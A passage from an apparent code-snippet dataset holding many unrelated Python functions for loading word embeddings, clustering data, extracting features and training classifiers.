embeddings_index[word] = coefs\n\n return embeddings_index", "def cluster_shrinkage_clustering(from_file):\n points = read_points(from_file)\n shuffle(points)\n S = similarity_matrix(points, similarity_measure=euclidean_distance)\n A = cluster(S, k=10, max_iter=1000)\n labels = [np.argmax(p) for p in A]\n xs, ys = zip(*points)\n \n return xs, ys, labels", "def train_routine(training_file, output_folder):\n if output_folder[-1] != '/':\n output_folder += '/'\n\n svm_file = output_folder + 'svm.txt'\n centroid_file = output_folder + 'centroids.txt'\n ids_file = output_folder + 'ids.txt'\n\n surf = cv2.SURF(250, extended=False)\n categories = dict()\n ids = dict()\n id = 1\n features = list()\n\n print \"Extracting features\"\n for line in open(training_file):\n try:\n category, path = line.split(';')\n except:\n print \"Error: File not in proper format. Ensure: <category/class name>; <path to image of said category>\"\n sys.exit(0)\n path = path.strip()\n\n try:\n img = cv2.imread(path)\n #img = cv2.resize(img, (500, 500))\n except Exception as e:\n print e\n continue\n\n keypoints, descriptors = surf.detectAndCompute(img, None)\n\n if not category in categories:\n categories[category] = Category(label=category)\n ids[category] = id\n id += 1\n categories[category].add_feature(descriptors)\n\n #for category in categories:\n #f = categories[category].yield_features()\n ##features.extend(f)\n #for i in f:\n #features.extend(i)\n\n print \"Calculating centroids\"\n #np_features = numpy.array(features)\n #print \"Features: \", np_features.shape\n #centroids, labels = kmeans2(np_features, FEATURE_TYPES)\n centroids = helpers.loadObject(output_folder + 'centroids.txt')\n print centroids.shape\n\n print \"Forming bag of words\"\n X, Y = [], []\n for category in categories:\n categories[category].calc_bagofwords(centroids)\n for bow in categories[category].bagofwords:\n X.append(bow)\n Y.append(ids[category])\n print \"Fitting linear SVMs onto the bag of words\"\n lin_clf = svm.LinearSVC()\n lin_clf.fit(X, Y)\n\n helpers.saveObject(lin_clf, svm_file)\n helpers.saveObject(centroids, centroid_file)\n helpers.saveObject(ids, ids_file)", "def print_cluster_attributes(self, objects):\n print(\"\\n\")\n print((\"ClusterName\".ljust(35),\":\",objects.ClusterName.value()))\n print((\"Repository Disk\".ljust(35),\":\", \\\n objects.RepositoryDisk.PhysicalVolume[0].VolumeName.value()))\n print(\"\\nNodes in the cluster :\\n-----------------------\")\n for Node in objects.Node.Node :\n print((\"HostName\".ljust(35),\":\",\\\n Node.HostName.value()))\n print((\"PartitionID\".ljust(35),\":\", \\\n Node.PartitionID.value()))\n print()", "def get_label_vectors():\n print(\"Retrieving label vectors...\")\n label_dict = {} # instantiate dict for labels:vectors\n categories = sorted([c for c in os.listdir('images/') if c[0] != '.']) # ignore hidden files\n x = np.zeros(len(categories)) # zero vector of number of categories\n for i, c in enumerate(categories): # get index and category for images\n y = x.copy() # use copy of x\n y[i] = 1 # set label index to true\n label_dict[c] = y.copy() # create label:vector\n\n return label_dict", "def cluster_text(list_of_text):\n print(\"Clustering text info saved the clustering.txt\")\n vectorizer = TfidfVectorizer(stop_words=\"english\")\n transform = vectorizer.fit_transform(list_of_text)\n\n true_k = 70\n\n model = MiniBatchKMeans(n_clusters=true_k, init=\"k-means++\", max_iter=100, n_init=1)\n model.fit(transform)\n clusters = {}\n for i in model.labels_:\n if not i in clusters:\n clusters[i] = 1\n else:\n clusters[i] += 1\n\n order_centroids = model.cluster_centers_.argsort()[:, ::-1]\n terms = vectorizer.get_feature_names()\n with open(\"clustering.txt\", \"w+\") as f:\n f.write(\"Top terms per cluster:\\n\")\n for i in range(true_k):\n with open(\"clustering.txt\", \"a\") as f:\n f.write(f\"Cluster {i}\\n\")\n f.write(f\"Number of tweets in this cluster: {clusters[i]}\\n\")\n term_list = []\n for ind in order_centroids[i, :10]:\n with open(\"clustering.txt\", \"a\") as f:\n f.write(terms[ind] + \"\\n\")\n term_list.append(terms[ind] + \"\\n\")\n return model.labels_", "def load_glove_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n for i,line in enumerate(f):\n L = line.split()\n word = L[0].lower()\n if word in vocab:\n word_vecs[word] = np.array(L[1:], dtype='float32')\n return word_vecs", "def clusters(self, *args, **kwargs):\n\n result, name = is_file(kwargs.get('value')[0])\n if result:\n jdata = load_file(name)\n dump = False\n else:\n url = self.base.format('file/clusters')\n if by_id:\n self.params['query'] = 'cluster:{0}'.format(kwargs.get('value')[0])\n else:\n self.params['date'] = name\n jdata, response = get_response(url, apikey=self.apikey, params=self.params)\n\n if kwargs.get('return_raw'):\n return jdata\n\n if _check_error(jdata):\n return\n\n simple_list = (\n 'size_top200',\n 'num_clusters',\n )\n\n self.simple_print(jdata, simple_list, indent='\\n\\t')\n for key in simple_list:\n if jdata.get(key):\n self.print_key(key, indent='\\n\\t')\n print('\\n\\t', jdata.get(key))\n\n if jdata.get('clusters'):\n plist = [[]]\n for line in jdata['clusters']:\n plist.append(\n [line['label'], line['avg_positives'], line['id'], line['size']])\n\n pretty_print_special(\n plist,\n ['Label', 'AV Detections', 'Id', 'Size'],\n [40, 15, 80, 8],\n ['l', 'c', 'l', 'c'],\n kwargs.get('email_template')\n )\n\n if dump:\n jsondump(jdata, 'clusters_{0}'.format(name))", "def read_features_from_file(filename):\n\tf = np.loadtxt(filename)\n\treturn f[:,:4],f[:,4:] # feature locations, descriptors", "def load_features_labels(self):\n MFCCs = torch.from_numpy(np.load(self.feature_file))\n labels = torch.from_numpy(np.load(self.label_file))\n 'Loading from files finished!'\n return MFCCs.view(-1,1,128,128), labels.long()", "def main():\n arguments = docopt(__doc__, version='cluster_parameter_extractor 1.0 BETA')\n\n input_file = arguments['--input']\n output_file = arguments[\"--output\"]\n process_synthetic = arguments[\"--synthetic_peptides\"]\n\n # make sure the input file exists\n if not os.path.isfile(input_file):\n print(\"Error: Cannot find input file '\" + input_file + \"'\")\n sys.exit(1)\n\n # make sure the output file does not exist\n if os.path.isfile(output_file):\n print(\"Error: Output file exists '\" + output_file + \"'\")\n sys.exit(1)\n\n with open(output_file, \"w\") as OUT:\n # write the header\n OUT.write(\"id\\tprecursor_mz\\tav_charge\\tsize\\tidentified_spec_count\\tunidentified_spec_count\\t\"\n \"max_ratio\\tmax_il_ratio\\tprecursor_mz_range\\tsequences\\t\"\n \"max_sequence\\tmax_sequence_count\\tmax_sequence_mods\\t\"\n \"second_max_sequence\\tsecond_max_sequence_count\\tsecond_max_sequence_mods\\tn_input_files\\t\"\n \"max_consensus_peak_rel_tic\\tmax_consensus_peak_mz\")\n\n if process_synthetic:\n OUT.write(\"\\tsynth_count\\tsynth_ratio\\tsynth_max_sequence\")\n\n OUT.write(\"\\n\")\n\n # process the file\n parser = clustering_parser.ClusteringParser(input_file)\n\n for cluster in parser:\n cluster_line = process_cluster(cluster)\n OUT.write(cluster_line)\n\n # process synthetic peptides\n if process_synthetic:\n synth_line = process_synthetic_peptides(cluster)\n OUT.write(\"\\t\" + synth_line)\n\n OUT.write(\"\\n\")\n\n print(\"Results written to \" + output_file)", "def parse_tab_file_get_clusters(filename1,\r\n seq_db):\r\n cluster_file = open(filename1, \"r\")\r\n # dictionaries for keeping the counts\r\n member_in_cluster_to_count_dict = dict()\r\n species_in_cluster_count_dict = dict()\r\n names, names_abudance_removed = get_names_from_Seq_db(seq_db)\r\n\r\n # a way of keeping track of the iteration\r\n interation_count = int(0)\r\n # iterate through the file\r\n for line in cluster_file:\r\n interation_count += 1\r\n # call the func to split up the line\r\n cluster_line_split = parse_line(line.rstrip())\r\n if not cluster_line_split:\r\n # this could be a blank line or starts with #\r\n continue\r\n # call the function to get the number of\r\n # elements and species.\r\n members_count, \\\r\n species_count = count_element_in_cluster(cluster_line_split,\r\n names,\r\n names_abudance_removed)\r\n try:\r\n # if we have seen this count before,\r\n # then just add one to it.\r\n member_in_cluster_to_count_dict[members_count] += 1\r\n except KeyError:\r\n # not seen this before, set up a new dic element\r\n # and make the equal 1\r\n member_in_cluster_to_count_dict[members_count] = 1\r\n try:\r\n # if we have seen this count of species before,\r\n # then just add one to it.\r\n species_in_cluster_count_dict[species_count] += 1\r\n except KeyError:\r\n species_in_cluster_count_dict[species_count] = 1\r\n species_in_cluster_list, species_number_of_keys, species_max_val, \\\r\n species_vals_for_bar_chart = covert_dict_to_list_of_value(\r\n species_in_cluster_count_dict)\r\n\r\n # print (\"member_in_cluster_to_count_dict: \",\r\n # member_in_cluster_to_count_dict)\r\n member_in_cluster_list, member_number_of_keys, member_max_val, \\\r\n member_vals_for_bar_chart = covert_dict_to_list_of_value(\r\n member_in_cluster_to_count_dict)\r\n # plot_multi_bar_chart_graph\r\n plot_multi_bar_chart_graph(\"Barchart: database species clusters\",\r\n species_vals_for_bar_chart,\r\n \"Barchart: total members in all cluster\",\r\n member_vals_for_bar_chart,\r\n \"Barchart: cluster size\",\r\n member_vals_for_bar_chart,\r\n filename1)", "def extract_feature_vectors(file, dict):\n f = open(file, 'r')\n num_lines = 0\n\n for line in f:\n if(line.strip()):\n num_lines = num_lines + 1\n\n f.close()\n\n feature_matrix = np.zeros([num_lines, len(dict)])\n\n f = open(file, 'r')\n pos = 0\n\n for line in f:\n if(line.strip()):\n flist = extract_words(line)\n for word in flist:\n if(word in dict):\n feature_matrix[pos, dict.index(word)] = 1\n pos = pos + 1\n\n f.close()\n\n return feature_matrix", "def load_model(self, file=FILENAME, dim=DIMENSION, normalize=False):\n print(\"Loading pretrained Glove vectors from file {}\".format(FILENAME))\n self.dimension = dim\n self.normalize = normalize\n with open(file, \"r\", encoding=\"utf-8\") as textfile:\n self.num_tokens = count_lines(textfile)\n self.tokens_arr = [\"\" for i in range(self.num_tokens)]\n self.embeddings_mat = np.zeros((self.num_tokens, self.dimension))\n\n for idx, line in enumerate(textfile):\n line = line.split()\n token = ''.join(line[:-self.dimension])\n self.tokens_arr[idx] = token\n self.token_to_idx[token] = idx \n vec = list(map(float, line[-self.dimension:]))\n if self.normalize: \n # normalize the vectors as they are put into the matrix\n vec = vec / np.linalg.norm(vec)\n self.embeddings_mat[idx] = vec \n if (idx+1) % 200000 == 0:\n print(\" --{}% loaded.\".format(round(idx/self.num_tokens*100, 2)))\n print(\"Finished loading Glove model. {} vectors loaded\".format(self.num_tokens))", "def cluster_features(self):\n logger.info('Creating term-document matrix...')\n self._create_tdm()\n init_centroids = self.centroids_from_categories()\n\n # Cluster the features using specific centroids.\n logger.info('Clustering features...')\n self.kmeans = KMeans(init=init_centroids, n_init=1, max_iter=1, n_clusters=len(self.feature_categories))\n self.clusters = self.kmeans.fit_predict(self.tdm)\n\n # The feature vector maps key features (categories) to other features that occur in the same cluster.\n logger.info('Converting clusters to feature vectors...')\n feature_vectors = self.clusters_to_feature_vectors(category_features=list(self.feature_amenity_map.keys()))\n\n return feature_vectors", "def read_labelmap_vidor(labelmap_file):\n\n labelmap = []\n class_ids = set()\n name = \"\"\n class_id = \"\"\n\n with open('idx_to_pred.pkl', 'rb') as f:\n idx_to_pred = pickle.load(f)\n\n # with PathManager.open(labelmap_file, \"r\") as f:\n # import pdb; pdb.set_trace()\n # for line in f:\n # if line.startswith(\" name:\"):\n # name = line.split('\"')[1]\n # elif line.startswith(\" id:\") or line.startswith(\" label_id:\"):\n # class_id = int(line.strip().split(\" \")[-1])\n # labelmap.append({\"id\": class_id, \"name\": name})\n # class_ids.add(class_id)\n # return labelmap, class_ids\n\n \"\"\"\n (Pdb) categories\n [{'id': 1, 'name': 'bend/bow (at the waist)'}, {'id': 3, 'name': 'crouch/kneel'}, {'id': 4, 'name': 'dance'}, {'id': 5, 'name': 'fall down'}, {'id': 6, 'name': 'get up'}, {'id': 7, 'name': 'jump/leap'}, {'id': 8, 'name': 'lie/sleep'}, {'id': 9, 'name': 'martial art'}, {'id': 10, 'name': 'run/jog'}, {'id': 11, 'name': 'sit'}, {'id': 12, 'name': 'stand'}, {'id': 13, 'name': 'swim'}, {'id': 14, 'name': 'walk'}, {'id': 15, 'name': 'answer phone'}, {'id': 17, 'name': 'carry/hold (an object)'}, {'id': 20, 'name': 'climb (e.g., a mountain)'}, {'id': 22, 'name': 'close (e.g., a door, a box)'}, {'id': 24, 'name': 'cut'}, {'id': 26, 'name': 'dress/put on clothing'}, {'id': 27, 'name': 'drink'}, {'id': 28, 'name': 'drive (e.g., a car, a truck)'}, {'id': 29, 'name': 'eat'}, {'id': 30, 'name': 'enter'}, {'id': 34, 'name': 'hit (an object)'}, {'id': 36, 'name': 'lift/pick up'}, {'id': 37, 'name': 'listen (e.g., to music)'}, {'id': 38, 'name': 'open (e.g., a window, a car door)'}, {'id': 41, 'name': 'play musical instrument'}, {'id': 43, 'name': 'point to (an object)'}, {'id': 45, 'name': 'pull (an object)'}, {'id': 46, 'name': 'push (an object)'}, {'id': 47, 'name': 'put down'}, {'id': 48, 'name': 'read'}, {'id': 49, 'name': 'ride (e.g., a bike, a car, a horse)'}, {'id': 51, 'name': 'sail boat'}, {'id': 52, 'name': 'shoot'}, {'id': 54, 'name': 'smoke'}, {'id': 56, 'name': 'take a photo'}, {'id': 57, 'name': 'text on/look at a cellphone'}, {'id': 58, 'name': 'throw'}, {'id': 59, 'name': 'touch (an object)'}, {'id': 60, 'name': 'turn (e.g., a screwdriver)'}, {'id': 61, 'name': 'watch (e.g., TV)'}, {'id': 62, 'name': 'work on a computer'}, {'id': 63, 'name': 'write'}, {'id': 64, 'name': 'fight/hit (a person)'}, {'id': 65, 'name': 'give/serve (an object) to (a person)'}, {'id': 66, 'name': 'grab (a person)'}, {'id': 67, 'name': 'hand clap'}, {'id': 68, 'name': 'hand shake'}, {'id': 69, 'name': 'hand wave'}, {'id': 70, 'name': 'hug (a person)'}, {'id': 72, 'name': 'kiss (a person)'}, {'id': 73, 'name': 'lift (a person)'}, {'id': 74, 'name': 'listen to (a person)'}, {'id': 76, 'name': 'push (another person)'}, {'id': 77, 'name': 'sing to (e.g., self, a person, a group)'}, {'id': 78, 'name': 'take (an object) from (a person)'}, {'id': 79, 'name': 'talk to (e.g., self, a person, a group)'}, {'id': 80, 'name': 'watch (a person)'}]\n (Pdb) class_whitelist\n {1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 17, 20, 22, 24, 26, 27, 28, 29, 30, 34, 36, 37, 38, 41, 43, 45, 46, 47, 48, 49, 51, 52, 54, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 72, 73, 74, 76, 77, 78, 79, 80}\n \"\"\"", "def _load_glove_vec(fname, vocab):\n print 'load glove...'\n word_vecs = {}\n cnt = 0\n l = open(fname,'r').readline()\n embedding_size = len(l.strip().split()) -1\n print 'embedding vector size: %d'%(embedding_size)\n with open(fname, \"r\") as f:\n for l in f:\n stemp = l.strip().split(' ',1)\n assert len(stemp) == 2\n word = stemp[0]\n if word in vocab:\n word_vecs[stemp[0]] = np.fromstring(' '.join(stemp[1:]),sep = ' ')\n cnt+=1\n if cnt%10000==0:\n print '%d lines...'%cnt\n return (word_vecs,embedding_size)", "def load_vector_dictionary():\n return read_word2vecs_from_file(VECTOR_FILE)", "def create_mallet_clusters(filename, num_clusters, vocab):\n # Words that appear in the MALLET clusters\n cluster_words = []\n # Clusters - each cluster is a list with entries in format (word, counts)\n clusters_with_counts = [None] * num_clusters\n\n with open(filename, 'r') as f:\n lines = f.readlines()\n\n for line in lines:\n tokens = line.strip().split()\n # Extract word and highest count from MALLET file\n # Highest count has form i:j where i is the cluster id\n # and j is the number of counts\n word, highest_count = tokens[1:3]\n if word in vocab:\n cluster_words.append(word)\n cluster_idx, count = [int(s) for s in highest_count.split(':')]\n if clusters_with_counts[cluster_idx] is None:\n clusters_with_counts[cluster_idx] = [(word, count)]\n else:\n clusters_with_counts[cluster_idx].append((word, count))\n\n for c in clusters_with_counts:\n c.sort(key=lambda x: x[1], reverse=True)\n\n # Clusters with words only (sorted in descending count order)\n clusters_words_only = []\n for c in clusters_with_counts:\n clusters_words_only.append([x[0] for x in c])\n\n return clusters_words_only, clusters_counts, cluster_words", "def writeClusterLabels(self, outfile, multiout=False):\n if multiout:\n print \"Writing classification to multiple output files, one class per file ...\"\n # Write classified points to different files, one file for one class for\n # easy display in CloudCompare\n fileprefix = \".\".join(outfile.split(\".\")[0:-1])\n cl_max = np.max(self.labels)\n namefmtstr = \"_{0:0>\"+str(len(str(cl_max)))+\"d}.txt\"\n ulabels, label_inv = np.unique(self.labels, return_inverse=True)\n outfobjs = [open(fileprefix+namefmtstr.format(cl), 'w') for cl in ulabels]\n\n headerstr = \"\"\n npts = len(self.labels)\n with open(self.inptsfile, 'r') as infobj:\n headerstr += infobj.readline().rstrip('\\n')+\"[Clustering by {0:s}]\\n\".format(self.classifier)\n infobj.readline()\n headerstr += \"Run made at: \"+time.strftime(\"%c\")+\"\\n\"\n headerstr += infobj.readline().rstrip('\\n')+\",ndi,ndi0,clabel\\n\"\n\n junk = [ fobj.write(headerstr) for fobj in outfobjs ]\n\n for n, (si, si0, label) in enumerate(itertools.izip(self.ndi, self.ndi0, self.labels)):\n outfobjs[label_inv[n]].write(infobj.readline().rstrip('\\n')+\",{0:.3f},{1:.3f},{2:d}\\n\".format(si, si0, label))\n if self.verbose and (n % 1000 == 0):\n sys.stdout.write(\"Writing points {0:d} % \\r\".format((n*100)/npts))\n\n junk = [ fobj.close() for fobj in outfobjs ]\n else:\n # Write all classified points to a single file\n print \"Writing classification to one output file ...\"\n npts = len(self.labels)\n headerstr = \"\"\n with open(self.inptsfile, 'r') as infobj, open(outfile, 'w') as outfobj:\n headerstr += infobj.readline().rstrip('\\n')+\"[Clustering by {0:s}]\\n\".format(self.classifier)\n infobj.readline()\n headerstr += \"Run made at: \"+time.strftime(\"%c\")+\"\\n\"\n headerstr += infobj.readline().rstrip('\\n')+\",ndi,ndi0,clabel\\n\"\n outfobj.write(headerstr)\n\n # outfobj.write(infobj.readline().rstrip('\\n')+\"[Clustering by KMeans]\\n\")\n # infobj.readline()\n # outfobj.write(\"Run made at: \"+time.strftime(\"%c\")+\"\\n\")\n # outfobj.write(infobj.readline().rstrip('\\n')+\",clabel\\n\")\n\n for n, (si,si0, label) in enumerate(itertools.izip(self.ndi, self.ndi0, self.labels)):\n outfobj.write(infobj.readline().rstrip('\\n')+\",{0:.3f},{1:.3f},{2:d}\\n\".format(si, si0, label))\n if self.verbose and (n % 1000 == 0):\n sys.stdout.write(\"Writing points {0:d} % \\r\".format((n*100)/npts))", "def load_embeddings(embeddings_path):\n\n embeddings_index = {}\n f = open(embeddings_path, encoding='utf-8')\n for line in tqdm(f):\n values = line.rstrip().split(' ')\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n f.close()\n print('Found {} word vectors.'.format(len(embeddings_index)))\n return embeddings_index", "def loadGLOVE(filename, vocab):\n dct = {}\n vectors = array.array('d')\n current_idx = 0\n with codecs.open(filename, \"r\", encoding=\"utf-8\") as f:\n for _, line in enumerate(f):\n tokens = line.split(\" \")\n word = tokens[0]\n entries = tokens[1:]\n if not vocab or word in vocab:\n dct[word] = current_idx\n vectors.extend(float(x) for x in entries)\n current_idx += 1\n word_dim = len(entries)\n num_vectors = len(dct)\n tf.logging.info(\"Found {} out of {} vectors in Glove\".format(num_vectors, len(vocab)))\n return [np.array(vectors).reshape(num_vectors, word_dim), dct]", "def assignLabels(self):\n clusters = np.arange(0, len(self.V))[self.V < self.V1] #indexes self.V, volumes_sorted, and oldOrder\n self.clusterV = self.volumes_sorted[clusters]\n clusters = self.oldOrder[clusters] #indexes volumes\n self.clusters = self.nonBI[clusters] #indexes self.vor and self.data\n self.easyLabel = np.zeros(len(self.data))\n self.easyLabel[self.clusters] = 1\n print('Out of ' + str(len(self.data)) + ' particles, ' + str(len(self.clusters)) + ' (' + str(round(len(self.clusters)*100/len(self.data), 3)) +' %) are labelled as cluster particles.')", "def cluster_classify(bounding_boxes):\n features = []\n for box_index in range(bounding_boxes.shape[0]):\n area, ratio = ratio_area_calculate(bounding_boxes[box_index])\n features.append([area, ratio])\n\n features_a = np.asarray(features, dtype=np.float32)\n print(features_a.shape)\n\n criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n ret, label, center = cv.kmeans(features_a, 4, None, criteria, 10, cv.KMEANS_RANDOM_CENTERS)\n center_list = []\n for ctr in range(center.shape[0]):\n center_list.append(center[ctr, 0])\n sort_list = center_list.copy()\n sort_list.sort()\n index_list = []\n for element in sort_list:\n index_list.append(center_list.index(element))\n\n small = features_a[label.ravel() == index_list[0]]\n middle = features_a[label.ravel() == index_list[1]]\n large = features_a[label.ravel() == index_list[2]]\n poly = features_a[label.ravel() == index_list[3]]\n\n plt.scatter(small[:, 0], small[:, 1])\n plt.scatter(middle[:, 0], middle[:, 1], c='r', marker='s')\n plt.scatter(large[:, 0], large[:, 1], c='g', marker='d')\n plt.scatter(poly[:, 0], poly[:, 1], c='b', marker='^')\n plt.legend(['small bubble', 'middle bubble', 'large bubble', 'poly bubble'])\n plt.xlabel('area')\n plt.ylabel('aspect ratio')\n\n plt.show()\n\n return", "def info(file, extended, vlrs, points):\n try:\n with pylas.open(openbin_file(file)) as fp:\n echo_header(fp.header, extended)\n\n if vlrs:\n click.echo(20 * \"-\")\n echo_vlrs(fp)\n\n if points:\n click.echo(20 * \"-\")\n echo_points(fp)\n except fs.errors.ResourceNotFound as e:\n click.echo(click.style(\"Error: {}\".format(e), fg=\"red\"))", "def load_vectors(fname):\r\n # taken from: https://fasttext.cc/docs/en/english-vectors.html\r\n vectors_data = vocab.Vectors(name=fname)\r\n\r\n return vectors_data", "def feature_vecs_NLP(train_pos, train_neg, test_pos, test_neg):\n # English stopwords from nltk\n stopwords = set(nltk.corpus.stopwords.words('english'))\n \n # Determine a list of words that will be used as features. \n # This list should have the following properties:\n # (1) Contains no stop words\n # (2) Is in at least 1% of the positive texts or 1% of the negative texts\n # (3) Is in at least twice as many postive texts as negative texts, or vice-versa.\n # YOUR CODE HERE\n\n pos_unique_words = []\n neg_unique_words = []\n intermediate_vec = []\n feature_vec = []\n\n for line in train_pos:\n line = list(set(line))\n for word in line:\n if word not in stopwords:\n pos_unique_words.append(word)\n\n for line in train_neg:\n line = list(set(line))\n for word in line:\n if word not in stopwords:\n neg_unique_words.append(word)\n\n\n pos_word_dict = collections.Counter(pos_unique_words)\n neg_word_dict = collections.Counter(neg_unique_words)\n\n unique_words = list(set(pos_word_dict.keys()).intersection(set(neg_word_dict.keys())))\n\n for word in unique_words:\n if(pos_word_dict[word] >= 0.01*len(train_pos) or neg_word_dict[word] >= 0.01*len(train_neg)):\n intermediate_vec.append(word)\n\n for word in intermediate_vec:\n if (int(pos_word_dict[word]) >= 2*int(neg_word_dict[word])or neg_word_dict[word] >= 2*pos_word_dict[word]):\n feature_vec.append(word)\n\n train_pos_vec = []\n train_neg_vec = []\n test_pos_vec = []\n test_neg_vec = []\n # Using the above words as features, construct binary vectors for each text in the training and test set.\n # These should be python lists containing 0 and 1 integers.\n # YOUR CODE HERE\n for line in train_pos:\n lst = []\n for word in feature_vec:\n if word in line:\n lst.append(1)\n else:\n lst.append(0)\n train_pos_vec.append(lst)\n\n for line in train_neg:\n lst = []\n for word in feature_vec:\n if word in line:\n lst.append(1)\n else:\n lst.append(0)\n train_neg_vec.append(lst)\n\n for line in test_pos:\n lst = []\n for word in feature_vec:\n if word in line:\n lst.append(1)\n else:\n lst.append(0)\n test_pos_vec.append(lst)\n\n for line in test_neg:\n lst = []\n for word in feature_vec:\n if word in line:\n lst.append(1)\n else:\n lst.append(0)\n test_neg_vec.append(lst)\n\n # Return the four feature vectors\n return train_pos_vec, train_neg_vec, test_pos_vec, test_neg_vec", "def read_traindata (filename, labels = ['pos', 'neg']):\n def split (l):\n \"\"\"split one line into words and label\"\"\"\n segs = l.strip().split ('\\t')\n label = segs [-1]\n words = segs [:-1]\n return words, label\n \n encoding = chardet.detect(open (filename).read ()) ['encoding']\n \n with codecs.open (filename, 'r', encoding) as f:\n for line in f.readlines ():\n row = split (line)\n assert len (row) == 2\n assert isinstance(row [0], list)\n assert isinstance(row [1], basestring)\n print row [1]\n assert row [1] in labels\n yield row", "def demo():\n # declare dummy input vector with two dimensions:\n vectors = numpy.array([[2,4], [0,1], [1,1], [3,2], [4,0], [2,2], [8, 9], [8, 11]])\n\n # compute the distance matrix on the basis of the vectors via sklearn:\n dist_matrix = pairwise_distances(vectors, metric='cityblock')\n\n # plot the distance matrix:\n # dist_matrix.draw() this doesn't work anymore\n\n # initialize a temporal VNC clusterer, here with the Ward linkage method:\n clusterer = VNClusterer(dist_matrix, linkage='ward') # could also be a plain Clusterer()\n\n # start the clustering procedure:\n clusterer.cluster(verbose=1)\n\n labels = ['n'+str(i+1) for i in range(len(vectors))]\n # plot the result as a dendrogram\n clusterer.dendrogram.draw(save=True,\n labels=labels,\n title=\"VNC Analysis (Ward's Linkage)\")", "def updateClusterInfo(self):\n self.nPoints = len(self.labels)\n self.n = len(np.unique(self.labels))\n self.centers = [ [0.0 for j in range(3)] for i in range(self.n)]", "def cluster_data(data_loc, num_clusters, base_destination, vectorizer):\n cluster_df = __title_cluster_df(data_loc, num_clusters, vectorizer)\n if not os.path.isdir(base_destination):\n os.mkdir(base_destination)\n vec_path = os.path.join(base_destination, 'vectorizer.pkl')\n with open(vec_path, 'wb') as f:\n pickle.dump(vectorizer, f)\n cluster_stats = {}\n for i in range(num_clusters):\n titles = cluster_df[cluster_df['cluster']==i]['title']\n cluster_stats[i] = titles.shape[0]\n cluster_data = __get_data_with_titles(data_loc, titles)\n dest = os.path.join(base_destination, 'cluster_{}.json'.format(i))\n with open(dest, 'w') as f:\n json.dump(cluster_data, f)\n stats_path = os.path.join(base_destination, 'cluster_statistics.txt')\n with open(stats_path, 'w') as f:\n for cluster in cluster_stats.keys():\n f.write('cluster {}: '.format(cluster))\n f.write(str(cluster_stats[cluster]) + '\\n')", "def convert2libsvm(f_vec):\n line = ''\n \n label = int(f_vec[0])\n \n # if you specified a positive label ID in your data for one-versus-all\n if not (args.ova == None):\n line += '1' if (str(label-1) == str(args.ova)) else '0'\n else:\n line += str(label)\n \n # skip zero entries\n for feat_idx in xrange(2,f_vec.size+1):\n value = f_vec[feat_idx-1]\n if args.sparse == 1 and value == 0:\n continue\n else:\n line += (' ' + str(feat_idx-1) + ':' + str(f_vec[feat_idx-1]))\n \n return line", "def plotClusters(self):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n fig.set_size_inches(18.5, 9.5)\n ax.set_title('Identification of Cluster Particles with Voronoi Volumes', fontsize=22)\n ax.set_xlabel('x [m]', fontsize=18)\n ax.set_ylabel('y [m]', fontsize=18)\n ax.set_zlabel('z [m]', fontsize=18)\n\n strength = np.linspace(0, 0.8, len(self.unique_labels))\n np.random.shuffle(strength)\n colors = [plt.cm.nipy_spectral(each) for each in strength]\n np.random.shuffle(strength)\n colorsB = [plt.cm.nipy_spectral(each) for each in strength]\n\n for k, col, colB in zip(self.unique_labels, colors, colorsB):\n a = 1\n s = 3\n if k == -1:\n # Black used for noise.\n col = [1, 0, 0]\n a = 0.3\n s = 1\n\n class_member_mask = (self.labels == k)\n xy = self.data[class_member_mask]\n if len(xy) > 0:\n ax.scatter(xy[:, 0], xy[:, 1], xy[:, 2], c=np.reshape(np.array(col), (1, -1)),\n edgecolors=np.reshape(np.array(colB), (1, -1)), alpha=a, s=s, label='Cluster ' + str(k))", "def readin():\r\n nodes = np.loadtxt('Vnodes.txt', ndmin=2)\r\n mats = np.loadtxt('Vmater.txt', ndmin=2)\r\n elements = np.loadtxt('Veles.txt', ndmin=2)\r\n loads = np.loadtxt('Vloads.txt', ndmin=2)\r\n return nodes, mats, elements, loads", "def svm_read_feature(data_file_name, digit):\n\tprob_y = []\n\tprob_x = []\n\tfor line in open(data_file_name):\n\t\t#print line\n\t\tline = line.split(None, 1)\n\t\t#print line\n\t\t# In case an instance with all zero features\n\t\tif len(line) == 1: line += ['']\n\t\tlabel, features = line\n\t\t#parse prob_x\n\t\txi = {}\n\t\tind = 1\n\t\tfor e in features.split():\n\t\t\txi[ind] = float(e)\n\t\t\tind += 1\n\t\t#parse prob_y\n\t\tif int(float(label)) == digit:\n\t\t\tprob_y += [float(+1)]\n\t\telse:\n\t\t\tprob_y += [float(-1)]\n\t\tprob_x += [xi]\n\treturn (prob_y, prob_x)", "def test_file(self, file_name, version, classifier_type):\n labels = []\n with open(file_name) as f:\n for line in f.readlines():\n print(line,self.predict(line))\n labels.append(self.predict(line))\n \n filename = 'test_results-' + classifier_type + '-' + version + '.txt'\n \n with open(filename, 'w') as f:\n for label in labels:\n f.write(str(label)+\"\\n\")\n \n print (\"Results from \",file_name,\" printed to:\",filename)", "def main():\n\tif(len(sys.argv) < 6) :\n\t\tprint('Usage : python node_representation.py graphfile node2vec_file text_file word2vec_size, size_walk')\n\t\texit()\n\n\tgraph, node2vec_file, text_file, size_w2v, size_walk = sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4]), int(sys.argv[5])\t\n\t#loads graph, word2vec corpora and node2vec model\n\tfile = open(graph, 'rb')\n\tG = pickle.load(file) \n\tfile.close()\n\tnode2vec = load_node2vec(node2vec_file)\n\tdf_user_text, text, w2v_model = load_text(text_file, size_w2v)\n\n\tG = G.to_directed()\n\tG = nx.convert_node_labels_to_integers(G)\n\n\tnodes = list(G.nodes)\n\tgraph_data = {}\n\n\tprint('# iterating... ')\n\tfor node in nodes:\n\t\tusername = node\n\t\temb = node2vec[node]\n\t\tfeatures = get_topics_w2v(username, size_w2v, df_user_text, text, w2v_model)\n\t\twalk_nodes = random_walk_sampling_simple(G, node, size_walk)\n\t\twalk = []\n\t\tfor n in walk_nodes:\n\t\t\twalk.append(node2vec[n]) \n\t\tgraph_data[node] = Node(username, emb, features, walk)\n\n\tprint('ok!')\t\n\toutfile = 